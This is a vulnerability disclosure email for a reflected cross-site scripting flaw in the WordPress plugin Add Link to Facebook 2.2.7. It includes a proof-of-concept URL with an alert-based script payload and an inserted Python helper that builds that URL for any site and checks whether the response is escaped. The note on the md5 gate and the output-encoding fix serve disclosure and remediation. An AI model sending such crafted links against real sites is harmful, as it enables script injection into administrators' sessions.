Subject: Cross-Site Scripting (XSS) in Add Link to Facebook 2.2.7
Date: Thu, 13 Aug 2015 12:33:52 +0200

Hello,

Plugin: Add Link to Facebook 2.2.7 https://wordpress.org/plugins/add-link-to-facebook/

1. Cross-Site Scripting (XSS)

Authenticated users (e.g. editors) can inject HTML/JS code that is reflected back into the plugin's admin page.

Method: GET
Url: http://localhost/wp-admin/admin.php?page=add-link-to-facebook&multiple=c9db569cb388e160e4b86ca1ddff84d7&sites=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
Vulnerable parameters: sites
Notes: The multiple parameter in this URL is equal to md5('http://localhost/'). More precisely, it should be equal to md5(WPAL2Int::Redirect_uri()).

Example PHP callstack:
al2fb_render_admin   [/add-link-to-facebook/add-link-to-facebook-admin.php:47]

Verification:
http://localhost/wp-admin/admin.php?page=add-link-to-facebook&multiple=c9db569cb388e160e4b86ca1ddff84d7&sites=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
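The following Python helper is an added illustration, not part of this advisory or of the plugin's code. It rebuilds the proof-of-concept URL for an arbitrary site and classifies whether a fetched admin page reflects the sites parameter raw (vulnerable) or entity-encoded (fixed). It assumes, as the note above states, that the multiple gate is md5() of the plugin's redirect URI and that this URI is the site URL with a trailing slash; the two sample response bodies are constructed, and html.escape() stands in for what WordPress's esc_attr() would output for this particular payload.

```python
import hashlib
import html
from urllib.parse import urlencode

# Payload taken from the advisory's PoC URL (decoded form).
PAYLOAD = '"><img src=x onerror=alert(1) />'


def multiple_token(redirect_uri: str) -> str:
    """Assumption: the `multiple` gate is md5() of the plugin's redirect URI.
    The URI is public, so this is not a secret and not a security control."""
    return hashlib.md5(redirect_uri.encode("utf-8")).hexdigest()


def build_poc_url(site_url: str, payload: str = PAYLOAD) -> str:
    """Build the reflected-XSS PoC URL for a WordPress site.

    Assumption: Redirect_uri() for a default install is the site URL with a
    trailing slash. urlencode() uses quote_plus(), which yields exactly the
    encoding seen in the advisory (spaces as '+', '/' as '%2F')."""
    base = site_url.rstrip("/") + "/"
    query = urlencode({
        "page": "add-link-to-facebook",
        "multiple": multiple_token(base),
        "sites": payload,
    })
    return f"{base}wp-admin/admin.php?{query}"


def reflection_state(body: str, payload: str = PAYLOAD) -> str:
    """Classify how a response body reflects the payload.

    'unescaped' -> raw payload present, the injection lands (vulnerable)
    'escaped'   -> only the entity-encoded form is present (output encoded)
    'absent'    -> the parameter is not reflected at all
    html.escape(quote=True) is used as a stand-in for esc_attr(); for this
    payload (no single quote) both produce the same string."""
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


# Constructed sample responses (assumed attribute context; the real plugin
# markup is not shown in the advisory).
VULNERABLE_BODY = '<input type="text" name="sites" value="' + PAYLOAD + '">'
FIXED_BODY = (
    '<input type="text" name="sites" value="'
    + html.escape(PAYLOAD, quote=True)
    + '">'
)


if __name__ == "__main__":
    print(build_poc_url("http://localhost"))
    print("vulnerable sample:", reflection_state(VULNERABLE_BODY))
    print("fixed sample:     ", reflection_state(FIXED_BODY))
```

Because the redirect URI is public, the md5() check on multiple is no obstacle: anyone who can get an editor to open the link passes it, so it must not be mistaken for a CSRF or authorization control. The appropriate remediation is output encoding of the sites value before it is echoed, e.g. esc_attr() in an attribute context or esc_html() in element content, and a fetch of the admin page with an editor's session cookie should then return "escaped" rather than "unescaped" from reflection_state().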


--
Regards,
Marcin Probola,